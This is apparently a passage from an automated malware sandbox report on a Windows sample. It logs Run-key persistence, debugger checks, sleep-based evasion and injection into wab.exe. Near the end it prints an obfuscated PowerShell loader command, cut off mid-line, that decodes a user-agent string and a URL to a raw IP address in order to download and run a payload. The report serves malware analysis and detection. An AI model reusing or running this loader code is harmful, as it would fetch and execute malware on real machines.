              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_046605C7 push cs; ret 10_2_046605E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_04664DCF push cs; retf 10_2_04664DD0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_04661193 push ecx; iretd 10_2_04661195
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nyerhvervelsenJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nyerhvervelsenJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4668Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5224Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7902Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1843Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 3489Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 5461Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: foregroundWindowGot 1759Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1112Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4892Thread sleep count: 7902 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4892Thread sleep count: 1843 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3652Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4828Thread sleep count: 3489 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4632Thread sleep count: 100 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4632Thread sleep time: -300000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4632Thread sleep count: 5461 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4632Thread sleep time: -16383000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 3489 delay: -5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: wab.exe, 0000000A.00000002.4590474258.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000002.00000002.2661868047.0000023D7285E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWCh%SystemRoot%\system32\mswsock.dllhelboSnipeAntir.uncnBygge Lav+Chad+Hypo%M rg$PereSFl pt StarRingeT,ppnSkbngStr eBestkIsraoDi.qr Hete rdnN ale Kap.BlokcTommoTempu UmanDdfdt Cam ') ;$skppeskn=$Strengekorene[$Syningshallerne];}Bussemnd (Sarpedon 'Shal$DespgCor
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4660000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: E5FE74Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS 